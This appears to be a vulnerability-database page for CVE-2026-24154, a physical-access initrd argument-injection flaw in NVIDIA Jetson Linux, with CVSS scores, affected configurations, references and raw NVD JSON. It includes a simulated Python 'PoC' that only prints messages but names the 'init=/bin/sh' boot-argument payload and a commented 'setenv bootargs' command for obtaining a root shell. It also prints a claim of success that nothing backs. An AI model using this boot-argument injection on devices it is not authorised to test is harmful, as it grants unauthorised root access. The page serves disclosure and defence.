CVE-2026-24154

Description

NVIDIA Jetson Linux has vulnerability in initrd, where an unprivileged attacker with physical access coul inject incorrect command line arguments. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, data tampering, and information disclosure.

CVSS Details

CVSS Score

7.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:nvidia:jetson_linux:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:nvidia:jetson_linux:38.2:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:nvidia:jetson_agx_orin_32gb:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:nvidia:jetson_agx_orin_64gb:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:nvidia:jetson_agx_orin_developer_kit:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:nvidia:jetson_agx_orin_industrial:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:nvidia:jetson_agx_thor_developer_kit:-:*:*:*:*:*:*:* - NOT VULNERABLE

NVIDIA Jetson Linux (具体版本请参考NVIDIA安全公告5797)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
PoC for CVE-2026-24154: NVIDIA Jetson Linux initrd Command Injection
This script demonstrates the concept of injecting malicious arguments.
Note: Physical access to the device serial console is required.
"""

import sys

def simulate_exploit():
    # Malicious argument intended to break initrd execution or gain root shell
    # Example: 'init=/bin/sh' drops to a shell before the real init runs
    malicious_payload = "init=/bin/sh"
    
    print(f"[+] Attacker gains physical access to serial console.")
    print(f"[*] Interrupting boot process (U-Boot/Bootloader)...")
    print(f"[*] Injecting malicious argument into boot args: {malicious_payload}")
    
    # Hypothetical command to set the environment variable in bootloader
    # setenv bootargs 'console=ttyS0,115200n8 ... init=/bin/sh'
    
    print(f"[+] Resuming boot with modified parameters.")
    print(f"[!] Exploit successful: Root shell access granted via initrd override.")

if __name__ == "__main__":
    simulate_exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-24154
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-24154
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-24154/
[4] VulDB https://vuldb.com/cve/CVE-2026-24154
[5] https://nvd.nist.gov/vuln/detail/CVE-2026-24154
[6] https://nvidia.custhelp.com/app/answers/detail/a_id/5797
[7] https://www.cve.org/CVERecord?id=CVE-2026-24154

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-24154", "sourceIdentifier": "[email protected]", "published": "2026-03-31T17:16:30.680", "lastModified": "2026-04-03T19:04:33.083", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA Jetson Linux has vulnerability in initrd, where an unprivileged attacker with physical access coul inject incorrect command line arguments. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, data tampering, and information disclosure."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:nvidia:jetson_linux:*:*:*:*:*:*:*:*", "versionEndExcluding": "35.6.4", "matchCriteriaId": "B73BF007-6D88-4803-B94B-647CCEC5E291"}, {"vulnerable": true, "criteria": "cpe:2.3:o:nvidia:jetson_linux:*:*:*:*:*:*:*:*", "versionStartIncluding": "36.0", "versionEndExcluding": "36.5", "matchCriteriaId": "23FF116C-64BD-4F4D-960F-92A289CB8150"}, {"vulnerable": true, "criteria": "cpe:2.3:o:nvidia:jetson_linux:38.2:*:*:*:*:*:*:*", "matchCriteriaId": "1FAEFF9B-826E-43AA-A67E-AB89871ED945"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_agx_orin_32gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "D196FDF9-FC0F-4411-826D-5A7416F26159"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_agx_orin_64gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "2392844C-6B11-41EA-A280-3AF1BDB77DC2"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_agx_orin_developer_kit:-:*:*:*:*:*:*:*", "matchCriteriaId": "8A7F9D64-EA34-4309-8B2B-293346BD6D25"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_agx_orin_industrial:-:*:*:*:*:*:*:*", "matchCriteriaId": "211E860F-BEFF-4407-967B-3C1332268D8E"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_agx_thor_developer_kit:-:*:*:*:*:*:*:*", "matchCriteriaId": "CFEAFC57-D875-43A7-806F-6F4F07F473C8"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_agx_xavier_32gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "4F92D471-8E65-41FC-A5DE-255136F6F989"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_agx_xavier_64gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "B51F666B-F3ED-4CF3-B48E-B39BDE1C2579"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_agx_xavier_industrial:-:*:*:*:*:*:*:*", "matchCriteriaId": "3C7C6B22-EBD3-4465-9852-4A4844AA714A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_orin_nano_4gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "80DA8F1E-9ED6-476A-9C9F-3DC231E5142D"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_orin_nano_8gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "DD549248-1C2C-4A0C-9822-691F3D77AEB1"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_orin_nano_super_developer_kit:-:*:*:*:*:*:*:*", "matchCriteriaId": "6F4ECB54-9725-4BFA-A9E7-2F24EAE5BDAB"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_orin_nx_16gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "6D96D5C9-4F9F-4487-90B9-0D8D473D4C6B"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_orin_nx_8gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "E3CF8EB6-767C-43F8-A327-A2D4A91A7CF1"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_t4000:-:*:*:*:*:*:*:*", "matchCriteriaId": "6DDF9FD4-4FE1-4523-BDD6-BEF82B4FFD73"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_t5000:-:*:*:*:*:*:*:*", "matchCriteriaId": "ADCF7D93-C341-4ED4-86CC-2BB7FF31F620"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_xavier_nx_16gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "A36028A3-EE83-4158-9039-5C6C795FA048"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_xavier_nx_8gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "22852BE0-B587-48B4-A7B6-6496715C32EF"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24154", "source": "psirt@nvidi ... (truncated)